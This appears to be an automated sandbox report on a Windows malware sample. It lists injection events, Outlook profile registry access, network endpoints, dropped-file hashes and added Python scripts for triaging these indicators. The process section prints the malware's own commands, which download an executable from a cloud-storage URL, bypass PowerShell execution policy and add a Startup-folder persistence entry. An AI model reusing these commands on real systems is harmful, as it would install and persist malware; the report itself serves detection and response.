PID 2256 wrote to memory of 2008 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 2008 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 4312 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 4312 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 4312 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 5004 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 5004 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 5004 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 3724 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 3724 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 3724 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 1832 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 1832 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 1832 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 864 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 864 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 864 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 2040 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe
PID 2256 wrote to memory of 2040 N/A C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe

"C:\Users\Admin\AppData\Local\Temp\c96a43db0abf02b0db8ca6efc658dc38.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Invoke-WebRequest -Uri "https://my.cloudme.com/v1/ws2/:slight-stood/:web_1/web" -OutFile "C:\Users\Public\Guard.exe""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"

C:\Users\Public\Guard.exe

"C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3

C:\Windows\SysWOW64\cmd.exe

cmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & echo URL="C:\Users\Admin\AppData\Local\WordGenius Technologies\SwiftWrite.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SwiftWrite.url" & exit

C:\Users\Public\jsc.exe

C:\Users\Public\jsc.exe

C:\Users\Public\jsc.exe

"C:\Users\Public\jsc.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value

C:\Windows\SysWOW64\Wbem\WMIC.exe

wmic diskdrive where "DeviceID=\'c:\'" get SerialNumber /value

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\AdobeSFX.log",start

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4512 -ip 4512

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4512 -s 784

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61

Network

Country Destination Domain Proto
US 8.8.8.8:53 my.cloudme.com udp
SE 83.140.241.4:443 my.cloudme.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 4.241.140.83.in-addr.arpa udp
US 8.8.8.8:53 14.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
SE 83.140.241.4:443 my.cloudme.com tcp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs udp
US 8.8.8.8:53 212.20.149.52.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
FR 46.105.141.51:443 tcp
US 8.8.8.8:53 51.141.105.46.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25466 tcp
N/A 127.0.0.1:25466 tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
FR 46.105.141.51:443 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25462 tcp
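Most rows in this table are resolver or OS noise. The `in-addr.arpa` queries are reverse (PTR) lookups, `224.0.0.251:5353` is mDNS, and the `127.0.0.1:25462` and `:25466` rows are loopback connections, meaning a listener inside the sandbox VM rather than an external server. What remains is a TLS session to `my.cloudme.com` (CloudMe, a cloud-storage service; the SE geolocation matches), two TLS connections to `46.105.141.51:443` with an empty Domain column, so no DNS lookup was recorded for that address, and one DNS query for a name whose labels are random mixed-case strings under a top-level label that is not a registered TLD, which cannot be a genuine hostname lookup. The following added example, not part of the original report, parses the 3- or 4-field rows and reduces the table to those points; the excerpt is constructed from the rows above with duplicate loopback rows trimmed, and the random-name heuristic is the example's own assumption.

```python
"""Reduce the Network table above to what a responder needs.

Added example for this report page; not part of the original report. Rows
have the form "Country Destination Domain Proto" with Domain sometimes
empty. Loopback, multicast and reverse (PTR) lookups are sandbox/OS noise;
what is left are the external endpoints and any DNS query that cannot be a
genuine hostname lookup.
"""
import ipaddress
import re
from collections import Counter

# Excerpt constructed from the rows above (duplicate loopback rows trimmed).
NETWORK_EXCERPT = """\
US 8.8.8.8:53 my.cloudme.com udp
SE 83.140.241.4:443 my.cloudme.com tcp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
SE 83.140.241.4:443 my.cloudme.com tcp
US 8.8.8.8:53 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs udp
FR 46.105.141.51:443 tcp
N/A 224.0.0.251:5353 udp
N/A 127.0.0.1:25462 tcp
N/A 127.0.0.1:25466 tcp
FR 46.105.141.51:443 tcp
"""

# Country, ip:port, optional domain, proto.
ROW_RE = re.compile(r"^(\S+)\s+(\S+):(\d+)\s+(?:(\S+)\s+)?(tcp|udp)$")


def parse_rows(text):
    rows = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = ROW_RE.match(line)
        if not m:
            raise ValueError("unparseable row: " + line)
        country, ip, port, domain, proto = m.groups()
        rows.append({"country": country, "ip": ip, "port": int(port),
                     "domain": domain or "", "proto": proto})
    return rows


def looks_random_dns(name):
    """Heuristic (assumption of this example): a top label longer than any
    registered TLD, or labels mixing upper and lower case, is not a normal
    hostname lookup."""
    labels = name.split(".")
    if len(labels[-1]) > 24:
        return True
    return any(lab != lab.lower() and lab != lab.upper() for lab in labels)


def classify(row):
    ip = ipaddress.ip_address(row["ip"])
    if ip.is_loopback:
        return "loopback"
    if ip.is_multicast:
        return "mdns" if row["port"] == 5353 else "multicast"
    if row["port"] == 53 and row["proto"] == "udp":
        d = row["domain"]
        if d.endswith(".in-addr.arpa"):
            return "ptr-lookup"          # reverse lookup, resolver/OS noise
        if looks_random_dns(d):
            return "suspicious-dns"
        return "dns"
    if row["port"] == 443 and row["proto"] == "tcp":
        return "tls"
    return "other"


def summarize(text):
    """Counts per class, external endpoints, loopback ports and flagged names."""
    counts, external, loopback_ports, flagged = Counter(), set(), set(), []
    for r in parse_rows(text):
        c = classify(r)
        counts[c] += 1
        if c == "loopback":
            loopback_ports.add(r["port"])
        elif c in ("tls", "other"):
            external.add((r["ip"], r["port"], r["domain"]))   # empty domain = no DNS seen
        elif c == "suspicious-dns":
            flagged.append(r["domain"])
    return {"counts": dict(counts), "external": external,
            "loopback_ports": loopback_ports, "flagged_dns": flagged}


if __name__ == "__main__":
    s = summarize(NETWORK_EXCERPT)
    print(s["counts"])
    for ip, port, dom in sorted(s["external"]):
        print(f"external {ip}:{port} {dom or '(no DNS lookup recorded)'}")
    print("loopback listeners on ports", sorted(s["loopback_ports"]))
    print("flagged DNS:", s["flagged_dns"])
```

An endpoint that shows up with an empty domain and no matching DNS row, as `46.105.141.51:443` does here, is the one to block by address; the CloudMe host is a shared service, so its IP is a weak indicator on its own.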

Files

memory/2292-0-0x00007FFB52293000-0x00007FFB52295000-memory.dmp

memory/2292-1-0x00000291F95A0000-0x00000291F95C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_j4fpf5no.m3f.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2292-11-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

memory/2292-12-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

memory/2292-16-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/3528-19-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

memory/3528-20-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0f6a3762a04bbb03336fb66a040afb97
SHA1 0a0495c79f3c8f4cb349d82870ad9f98fbbaac74
SHA256 36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383
SHA512 cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

C:\Users\Public\PublicProfile.ps1

MD5 315eab1b113060397deb5d4013e64eae
SHA1 d1578170885d0375b2aa22954badaeb36a539026
SHA256 dae667196e8dc197c7e0a5ecb4718d26f8a8276c72cc190e14cdf8ed67b3b8c5
SHA512 f74b12217c36bac596bda9ac1d86d256a13591916774b795dbd1cf1525c90f93d0b9fe26b68f19a4dacb751d0b4f3649e9cf42a2fa0a1e916b9326fbe3c09ced

memory/3528-32-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

memory/3528-33-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

memory/3528-34-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

C:\Users\Public\Guard.exe

MD5 18ce19b57f43ce0a5af149c96aecc685
SHA1 1bd5ca29fc35fc8ac346f23b155337c5b28bbc36
SHA256 d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd
SHA512 a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

memory/3528-39-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

C:\Users\Public\Secure.au3

MD5 4bdd41d598fd897ce21bd86264030448
SHA1 2907df32a0b8fb017a0f5ba53605245cc0119c44
SHA256 daf4100279eaabf2c17b8e08026f4da4ebd817dc16d381b3daebe7adb9384c7c
SHA512 7d3895d6640566bac911c3638328fd794ffcc6fcf4ce365848f0e498df16b4a5c5659efd4fb4eacb51d3d9a394457f55b9f3ae1c530de99554728b94d57d531f

memory/2348-48-0x0000000000C00000-0x00000000010C2000-memory.dmp

C:\Users\Public\jsc.exe

MD5 94c8e57a80dfca2482dedb87b93d4fd9
SHA1 5729e6c7d2f5ab760f0093b9d44f8ac0f876a803
SHA256 39e87f0edcdd15582cfefdfab1975aadd2c7ca1e3a5f07b1146ce3206f401bb5
SHA512 1798a3607b2b94732b52de51d2748c86f9453343b6d8a417e98e65ddb38e9198cdcb2f45bf60823cb429b312466b28c5103c7588f2c4ef69fa27bfdb4f4c67dc

memory/2348-51-0x0000000006930000-0x0000000006DBE000-memory.dmp

memory/2348-52-0x0000000008010000-0x00000000084A0000-memory.dmp

memory/2348-53-0x0000000008A50000-0x0000000008FF4000-memory.dmp

memory/2348-54-0x00000000085A0000-0x0000000008632000-memory.dmp

memory/2348-68-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-84-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-112-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-116-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-114-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-110-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-108-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-104-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-102-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-100-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-106-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-98-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-96-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-94-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-92-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-90-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-88-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-86-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-82-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-80-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-78-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-77-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-74-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-72-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-70-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-66-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-62-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-58-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-56-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-64-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-60-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-55-0x0000000008010000-0x000000000849A000-memory.dmp

memory/2348-1129-0x0000000005C90000-0x0000000006092000-memory.dmp

memory/2348-1130-0x0000000005940000-0x000000000598C000-memory.dmp

memory/2348-1134-0x00000000059A0000-0x00000000059F4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\AdobeSFX.log

MD5 7d96e2ae9f73e6b73fadaac62119c2a0
SHA1 f0e8de3ec0d6eb9cb90ac952288b6a9b423fbb76
SHA256 4ce7ab94060f74f36288dcce8ec72b65778183d99064660644834010f42b736b
SHA512 01b5a3d8ced0baa1bc3d4337831bfdebbdd98e6400061d828a29ea31c04c56d15ac1aa66a0e81c787491f0a8a542430fd2a39173a9a6ef446f04149da1df7666

C:\Users\Admin\AppData\Local\Temp\Rprwwhu

MD5 ab893875d697a3145af5eed5309bee26
SHA1 c90116149196cbf74ffb453ecb3b12945372ebfa
SHA256 02b1c2234680617802901a77eae606ad02e4ddb4282ccbc60061eac5b2d90bba
SHA512 6b65c0a1956ce18df2d271205f53274d2905c803d059a0801bf8331ccaa28a1d4842d3585dd9c2b01502a4be6664bde2e965b15fcfec981e85eed37c595cd6bc

\??\PIPE\srvsvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\Wwhhdyy

MD5 3fa34a107d5efe90ec17732840469e71
SHA1 1ffdb7ba783ce75c0df96e7a5d7692c5d85fe9f2
SHA256 e82d233f53a5198db04fe3ade2f981acaced60e661614deb520bbdc4a76820f8
SHA512 bcbbc4971d94df8dd55977691d180a606869cf5fafae9e0c22453cec8de6ca208038815341ac9aaf41643ea4e767e1980cd02fdf6558404a555728614fd43fab

C:\Users\Admin\AppData\Local\Temp\Uptawafrya

MD5 49693267e0adbcd119f9f5e02adf3a80
SHA1 3ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256 d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512 b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
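The artifact list mixes memory dumps (no hashes) with dropped files and one `\??\PIPE\srvsvc` handle whose four digests are exactly those of empty input, so that entry carries no content. Two names deserve a hash check rather than a guess: `jsc.exe` is also the name of the .NET JScript compiler, a Microsoft-signed binary, and only comparing the digest against a known-good copy decides whether the file in C:\Users\Public is that signed binary (then it is a host for injected code, cf. the SetThreadContext signature) or something renamed to look like it; likewise the AutoIT Executable signature together with `Secure.au3` suggests one of the dropped executables is an AutoIt interpreter, which a digest comparison with a known AutoIt3.exe build would confirm. The script below is an added example and not part of the report: it parses this path-plus-digest layout into records, validates digest lengths, matches arbitrary bytes or a directory tree against the list, and separates real dropped files from dumps and the empty pipe entry. The excerpt is constructed from the entries above; `scan_directory` is the example's own helper.

```python
"""Turn the Files list above into a checkable IOC set.

Added example for this report page; not part of the report. A record is a
path line followed by MD5/SHA1/SHA256/SHA512 lines; memory dump entries
have no digests. Digest lengths are validated so a truncated copy-paste
cannot silently turn into an indicator that never matches.
"""
import hashlib
import os
import re

# Excerpt constructed from the entries above (digests copied verbatim).
FILES_EXCERPT = r"""
memory/3528-39-0x00007FFB52290000-0x00007FFB52D51000-memory.dmp

C:\Users\Public\Guard.exe
MD5 18ce19b57f43ce0a5af149c96aecc685
SHA1 1bd5ca29fc35fc8ac346f23b155337c5b28bbc36
SHA256 d8b7c7178fbadbf169294e4f29dce582f89a5cf372e9da9215aa082330dc12fd
SHA512 a0c58f04dfb49272a2b6f1e8ce3f541a030a6c7a09bb040e660fc4cd9892ca3ac39cf3d6754c125f7cd1987d1fca01640a153519b4e2eb3e3b4b8c9dc1480558

C:\Users\Public\Secure.au3
MD5 4bdd41d598fd897ce21bd86264030448
SHA1 2907df32a0b8fb017a0f5ba53605245cc0119c44
SHA256 daf4100279eaabf2c17b8e08026f4da4ebd817dc16d381b3daebe7adb9384c7c
SHA512 7d3895d6640566bac911c3638328fd794ffcc6fcf4ce365848f0e498df16b4a5c5659efd4fb4eacb51d3d9a394457f55b9f3ae1c530de99554728b94d57d531f

C:\Users\Public\jsc.exe
MD5 94c8e57a80dfca2482dedb87b93d4fd9
SHA1 5729e6c7d2f5ab760f0093b9d44f8ac0f876a803
SHA256 39e87f0edcdd15582cfefdfab1975aadd2c7ca1e3a5f07b1146ce3206f401bb5
SHA512 1798a3607b2b94732b52de51d2748c86f9453343b6d8a417e98e65ddb38e9198cdcb2f45bf60823cb429b312466b28c5103c7588f2c4ef69fa27bfdb4f4c67dc

C:\Users\Admin\AppData\Local\Temp\AdobeSFX.log
MD5 7d96e2ae9f73e6b73fadaac62119c2a0
SHA1 f0e8de3ec0d6eb9cb90ac952288b6a9b423fbb76
SHA256 4ce7ab94060f74f36288dcce8ec72b65778183d99064660644834010f42b736b
SHA512 01b5a3d8ced0baa1bc3d4337831bfdebbdd98e6400061d828a29ea31c04c56d15ac1aa66a0e81c787491f0a8a542430fd2a39173a9a6ef446f04149da1df7666

\??\PIPE\srvsvc
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
"""

HASH_RE = re.compile(r"^(MD5|SHA1|SHA256|SHA512)\s+([0-9a-fA-F]+)$")
HEX_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}


def parse_files(text):
    """Records of {"path", "hashes"}; any non-hash line starts a new record."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        m = HASH_RE.match(line)
        if not m:
            records.append({"path": line, "hashes": {}})
            continue
        if not records:
            raise ValueError("digest line before any path: " + line)
        algo, digest = m.group(1), m.group(2).lower()
        if len(digest) != HEX_LEN[algo]:
            raise ValueError(f"{algo} digest has wrong length for {records[-1]['path']}")
        records[-1]["hashes"][algo] = digest
    return records


def digests(data):
    return {"MD5": hashlib.md5(data).hexdigest(), "SHA1": hashlib.sha1(data).hexdigest(),
            "SHA256": hashlib.sha256(data).hexdigest(), "SHA512": hashlib.sha512(data).hexdigest()}


def match_bytes(data, records):
    """Paths of records whose listed digests all agree with `data`."""
    d = digests(data)
    return [r["path"] for r in records
            if r["hashes"] and all(r["hashes"][a] == d[a] for a in r["hashes"])]


def dropped_file_records(records):
    """On-disk artifacts only: drop memory dumps (no digests) and empty-content entries."""
    empty = digests(b"")["SHA256"]
    return [r for r in records if r["hashes"] and r["hashes"].get("SHA256") != empty]


def sha256_of_file(path, chunk=1 << 20):
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_directory(root, records):
    """(local path, listed path) for every file under `root` matching a listed SHA256."""
    wanted = {r["hashes"]["SHA256"]: r["path"] for r in dropped_file_records(records)}
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for n in names:
            p = os.path.join(dirpath, n)
            try:
                h = sha256_of_file(p)
            except OSError:
                continue
            if h in wanted:
                hits.append((p, wanted[h]))
    return hits


if __name__ == "__main__":
    recs = parse_files(FILES_EXCERPT)
    print("empty-content entries:", match_bytes(b"", recs))
    for r in dropped_file_records(recs):
        print(r["hashes"]["SHA256"], r["path"])
```

`scan_directory` deliberately keys on SHA256 only and skips the empty-content record; otherwise every zero-byte file on a host would light up as the `srvsvc` pipe handle.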